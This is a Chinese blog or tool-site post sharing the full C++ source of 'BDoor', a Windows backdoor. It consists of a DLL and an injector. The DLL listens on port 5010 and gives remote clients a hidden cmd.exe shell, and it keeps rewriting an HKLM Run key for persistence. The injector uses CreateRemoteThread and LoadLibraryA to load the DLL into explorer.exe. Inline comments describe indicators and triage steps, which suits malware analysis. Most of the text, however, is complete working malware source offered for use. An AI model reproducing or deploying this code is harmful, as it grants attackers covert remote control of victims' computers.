后门程序BDoor及源码 选择自 amh 的 Blog
提交时间: 2005-04-22
提交用户: ffantasyYD
工具分类: 后门程序
运行平台: Windows
工具大小: 316825 Bytes
文件MD5: 95e120d97967a3679dfdbd82985ea1ca
工具来源: http://www.uestc.edu.cn/web/default.aspx
这是本人考研后的第一个作品(其实是很简陋的一个东西),拿出来共享,算是纪念考研成功吧!开放源代码,让大虾们见笑了。
// BDoor.cpp : Defines the entry point for the DLL application.//
#include "stdafx.h"#include "winsock2.h"
#pragma comment(lib,"ws2_32")
#define PORT 5010#define REG_RUN "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
// Arguments handed to the two relay threads started by BDoor().
//   sock   - the accepted client connection
//   handle - one end of an anonymous pipe wired to the spawned cmd.exe
//            (the write end for RecvThread, the read end for SendThread)
struct THREADPARAM
{
    SOCKET sock;
    HANDLE handle;
};
// Thread entry points; all are started with CreateThread (definitions below).
DWORD WINAPI ControlThread(void *no);
DWORD WINAPI BDoor(void *lp);
DWORD WINAPI RecvThread(void *lp);
DWORD WINAPI SendThread(void *lp);
DWORD WINAPI WriteReg(void *no);
// DLL entry point. On process attach it starts ControlThread (the listener)
// inside whichever process loaded the DLL; nothing is done on detach. When
// loaded through the remote LoadLibraryA thread in DllInjection.cpp (further
// down this page) the host is explorer.exe, so the listening socket and the
// cmd.exe children created below appear to belong to explorer.exe - the first
// place to look when triaging this sample.
BOOL APIENTRY DllMain( HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        {
            // The thread handle is discarded; the thread is intended to run
            // for the life of the host process.
            ::CreateThread(NULL,0,ControlThread,NULL,0,NULL);
            break;
        }
    case DLL_PROCESS_DETACH:
        {
            break;
        }
    }
    return TRUE;
}
// Listener thread. Starts the registry-persistence thread, then accepts TCP
// connections on every local address (sin_addr = 0) at PORT and hands each
// one to a BDoor() thread. This is a bind shell: while the DLL is resident the
// injected process owns an unexpected listening socket on PORT (5010 per the
// #define above), which is the network-side indicator for this sample.
DWORD WINAPI ControlThread(void *no)
{
    // Persistence is started first, independent of whether socket setup succeeds.
    CreateThread(NULL,0,WriteReg,NULL,0,NULL);
    WSADATA wsaData;
    SOCKET listenSock;
    if(::WSAStartup(MAKEWORD(2,2),&wsaData)!=0)
    {
        return -1;
    }
    if((listenSock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
    {
        return -1;
    }
    sockaddr_in localAddr,inAddr;
    int addrLen=sizeof(inAddr);
    localAddr.sin_addr.S_un.S_addr=0;   // bind to all interfaces
    localAddr.sin_family=AF_INET;
    localAddr.sin_port=htons(PORT);
    if(bind(listenSock,(sockaddr *)&localAddr,sizeof(localAddr))==SOCKET_ERROR)
    {
        closesocket(listenSock);
        return -1;
    }
    listen(listenSock,5);
    while(TRUE)
    {
        // BDoor() receives a pointer to this loop-local SOCKET; the Sleep(100)
        // presumably gives the new thread time to copy it before the next
        // accept() overwrites it.
        SOCKET acceptSock=accept(listenSock,(sockaddr *)&inAddr,&addrLen);
        DWORD ID;
        CreateThread(NULL,0,BDoor,&acceptSock,0,&ID);
        Sleep(100);
    }
    // Unreachable: the loop above has no exit.
    closesocket(listenSock);
    ::WSACleanup();
}
// Persistence thread. Builds "<SystemDirectory>\DllInjection.exe" and, every
// 5 seconds for the life of the host process, (re)writes it as the REG_SZ
// value "sysDll" under HKLM\<REG_RUN> (the per-machine Run key defined above).
// The data is written with strlen() bytes, i.e. without the terminating NUL.
// Two consequences for responders: the Run value reappears within 5 s of being
// deleted while the DLL is still resident, so the value, the injector
// executable and the DLL need to be removed while the DLL is not running; and
// a failed RegOpenKey() hits `continue` with no Sleep, so the thread spins
// until the key opens.
DWORD WINAPI WriteReg(void *no)
{
    char sysPath[MAX_PATH]={0};
    int ret=::GetSystemDirectory(sysPath,MAX_PATH);
    if(sysPath[ret-1]!='\\') strcat(sysPath,"\\");
    strcat(sysPath,"DllInjection.exe");
    int len=strlen(sysPath);
    while(TRUE)
    {
        HKEY hKey;
        if(::RegOpenKey(HKEY_LOCAL_MACHINE,REG_RUN,&hKey)!=ERROR_SUCCESS) continue;
        ::RegSetValueEx(hKey,"sysDll",0,REG_SZ,(BYTE *)sysPath,len);
        ::RegCloseKey(hKey);
        Sleep(5000);
    }
    return 0;
}
// Per-connection handler (one thread per accepted client). Creates two
// inheritable anonymous pipes, launches "<SystemDirectory>\cmd.exe" with a
// hidden window and stdin/stdout/stderr redirected to those pipes, then runs
// RecvThread (socket -> cmd stdin) and SendThread (cmd stdout -> socket) until
// the client disconnects or sends "exit". SendThread and cmd.exe are then
// force-terminated. Host-side indicator: a cmd.exe child of the injected
// process started with SW_HIDE and STARTF_USESTDHANDLES pointing at pipes,
// i.e. a console with no visible window whose I/O ends up on a network socket.
DWORD WINAPI BDoor(void *lp)
{
    SOCKET sock=*((SOCKET *)lp);
    HANDLE hCmdOut,hCmdIn,hRead,hWrite;
    SECURITY_ATTRIBUTES sec={0};
    sec.nLength=sizeof(sec);
    sec.lpSecurityDescriptor=NULL;
    sec.bInheritHandle=TRUE;   // pipe ends must be inheritable by cmd.exe
    // hCmdIn/hCmdOut are the child's ends; hWrite/hRead stay with this DLL.
    CreatePipe(&hCmdIn,&hWrite,&sec,0);
    CreatePipe(&hRead,&hCmdOut,&sec,0);
    char cmdDir[MAX_PATH]={0};
    ::GetSystemDirectory(cmdDir,MAX_PATH);
    if(cmdDir[strlen(cmdDir)-1]!='\\') strcat(cmdDir,"\\");
    strcat(cmdDir,"cmd.exe");
    STARTUPINFO startUpInfo={0};
    startUpInfo.cb=sizeof(startUpInfo);
    startUpInfo.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
    startUpInfo.wShowWindow=SW_HIDE;
    startUpInfo.hStdError=startUpInfo.hStdOutput=hCmdOut;
    startUpInfo.hStdInput=hCmdIn;
    PROCESS_INFORMATION processInfo={0};
    // bInheritHandles=TRUE so the child receives the pipe handles above.
    int ret=CreateProcess(cmdDir,NULL,NULL,NULL,TRUE,0,NULL,NULL,&startUpInfo,&processInfo);
    if(ret==0)
    {
        return -1;   // the four pipe handles and the socket stay open on this path
    }
    // The child holds its own copies; drop the parent's references.
    CloseHandle(hCmdIn);
    CloseHandle(hCmdOut);
    DWORD ID1,ID2;
    HANDLE hRecvThread,hSendThread;
    THREADPARAM recvParam={0},sendParam={0};
    recvParam.sock=sock;
    recvParam.handle=hWrite;
    hRecvThread=CreateThread(NULL,0,RecvThread,&recvParam,0,&ID1);
    sendParam.sock=sock;
    sendParam.handle=hRead;
    hSendThread=CreateThread(NULL,0,SendThread,&sendParam,0,&ID2);
    ULONG code;
    // Session lifetime is governed by RecvThread alone (peer closed or "exit");
    // SendThread never exits on its own, so it is killed rather than joined.
    ::WaitForSingleObject(hRecvThread,INFINITE);
    ::GetExitCodeThread(hSendThread,&code);
    ::TerminateThread(hSendThread,code);
    ::GetExitCodeProcess(processInfo.hProcess,&code);
    ::TerminateProcess(processInfo.hProcess,code);
    closesocket(sock);
    CloseHandle(hWrite);
    CloseHandle(hRead);
    return 0;
}
// Relay: client socket -> cmd.exe stdin. Reads one byte at a time, echoes
// every byte straight back to the client (so a capture of a session shows each
// command twice, typed and echoed), and accumulates the line in a fixed
// 256-byte buffer with strcat(); no bound is enforced on line length. On '\n'
// the line is written to the pipe, except that "exit\r\n" (compared
// case-insensitively) ends the session and returns control to BDoor(). A
// recv() error (negative return) is neither handled nor a loop exit; only a
// return of 0 (peer closed) ends the loop.
DWORD WINAPI RecvThread(void *lp)
{
    char cmd[256]={0};
    THREADPARAM param=*((THREADPARAM *)lp);
    while(1)
    {
        char temp[2]={0};
        int ret=recv(param.sock,temp,1,0);
        if(ret==0)
        {
            break;
        }
        else if(ret==1)
        {
            send(param.sock,temp,1,0);   // echo the byte back to the client
            strcat(cmd,temp);
            if(temp[0]=='\n')
            {
                if(_stricmp(cmd,"exit\r\n")==0)
                {
                    break;
                }
                ULONG len;
                ::WriteFile(param.handle,cmd,strlen(cmd),&len,NULL);
                memset(cmd,0,256);
            }
        }
    }
    return 0;
}
// Relay: cmd.exe stdout/stderr -> client socket. Polls the pipe every 100 ms
// with PeekNamedPipe() and forwards whatever is available, at most 1024 bytes
// per iteration. The loop has no exit condition: the thread only ends when
// BDoor() calls TerminateThread() on it, so the trailing `return 0` is never
// reached.
DWORD WINAPI SendThread(void *lp)
{
    THREADPARAM param=*((THREADPARAM *)lp);
    char buf[1024]={0};
    while(1)
    {
        ULONG len=0;
        ::PeekNamedPipe(param.handle,buf,1024,&len,NULL,NULL);
        if(len>0)
        {
            ::ReadFile(param.handle,buf,1024,&len,NULL);
            send(param.sock,buf,len,0);
            memset(buf,0,1024);
        }
        Sleep(100);
    }
    return 0;
}
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
// DllInjection.cpp : Defines the entry point for the application.//
#include "stdafx.h"#include "windows.h"#include "stdlib.h"#include "tlhelp32.h"#include "io.h"
// Returns the PID of the first process whose image name matches, or -1 (see below).
long GetProcessID(char *processName);
// Injector entry point - the executable that WriteReg() in BDoor.cpp registers
// under the Run key, so it presumably runs at each logon. After a 5 s delay it
// locates explorer by image name, resolves LoadLibraryA in its own kernel32,
// writes "<SystemDirectory>\BDoor.dll" into the target's address space and
// starts a remote thread at LoadLibraryA with that string as its argument -
// the classic CreateRemoteThread/LoadLibrary DLL-injection pattern. The code
// assumes kernel32 is mapped at the same base in the target so the local
// address is valid there. Telemetry that surfaces this: remote-thread
// creation into explorer.exe from a process in the system directory (e.g.
// Sysmon event 8) followed by explorer.exe loading BDoor.dll (Sysmon event 7).
int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
    // Fixed delay before touching explorer - presumably to let the shell finish starting.
    Sleep(5000);
    long ID=GetProcessID("explorer");
    if(ID==-1) return -1;
    HINSTANCE hDll;
    HINSTANCE (* pProc)(LPCTSTR);
    DWORD (WINAPI * pThreadProc)(void *);
    if((hDll=::LoadLibrary("kernel32.dll"))==NULL) return -1;
    if((pProc=(HINSTANCE (*)(LPCTSTR))::GetProcAddress(hDll,"LoadLibraryA"))==NULL) return -1;
    // LoadLibraryA is reinterpreted as a thread start routine whose single
    // argument is the remote string buffer allocated below.
    pThreadProc=(DWORD (WINAPI *)(void *))pProc;
    HANDLE hProcess=::OpenProcess(PROCESS_ALL_ACCESS,TRUE,ID);
    if(hProcess==NULL) return -1;
    char pDllPath[MAX_PATH]={0};
    char *pRemoteAddr=NULL;
    int ret=::GetSystemDirectory(pDllPath,MAX_PATH);
    if(pDllPath[ret-1]!='\\') strcat(pDllPath,"\\");
    strcat(pDllPath,"BDoor.dll");
    if(::_access(pDllPath,0)==-1) return -1;   // the DLL must already be on disk
    // strlen()+1 bytes are committed (zero-filled) but only strlen() bytes are
    // written; the terminating NUL comes from the fresh allocation.
    pRemoteAddr=(char*)::VirtualAllocEx(hProcess,NULL,strlen(pDllPath)+1,MEM_COMMIT,PAGE_READWRITE);
    if(pRemoteAddr==NULL) return -1;
    ret=::WriteProcessMemory(hProcess,pRemoteAddr,pDllPath,strlen(pDllPath),NULL);
    if(ret==0) return -1;
    HANDLE hRemoteThread=::CreateRemoteThread(hProcess,NULL,0,pThreadProc,pRemoteAddr,0,NULL);
    // The remote thread is neither waited on nor closed; the string buffer is
    // decommitted after a fixed 100 ms regardless of the remote thread's state.
    Sleep(100);
    ::VirtualFreeEx(hProcess,pRemoteAddr,strlen(pDllPath)+1,MEM_DECOMMIT);
    ::CloseHandle(hProcess);
    return 0;
}
// Returns the PID of the first running process whose image file name, with
// directory and extension stripped by _splitpath(), equals processName
// (case-insensitive), or -1 if the snapshot fails, enumeration fails, or no
// process matches. The Toolhelp snapshot handle is not closed on any path.
long GetProcessID(char *processName)
{
    HANDLE hSnapshot;
    PROCESSENTRY32 pe32={0};
    BOOL fRet;
    hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
    if(hSnapshot==NULL) return -1;
    pe32.dwSize=sizeof(PROCESSENTRY32);
    fRet=Process32First(hSnapshot,&pe32);
    if(!fRet) return -1;
    int g=0;
    char drive[_MAX_DRIVE]={0};
    char dir[_MAX_DIR]={0};
    char fname[_MAX_FNAME]={0};
    char ext[_MAX_EXT]={0};
    do
    {
        _splitpath(pe32.szExeFile,drive,dir,fname,ext);
        if(_stricmp(processName,fname)==0)
        {
            g=1;   // match found; pe32 still holds the matching entry
            break;
        }
    }while(Process32Next(hSnapshot,&pe32));
    if(g!=1) return -1;
    return pe32.th32ProcessID;
}
作者Blog:http://blog.csdn.net/amh/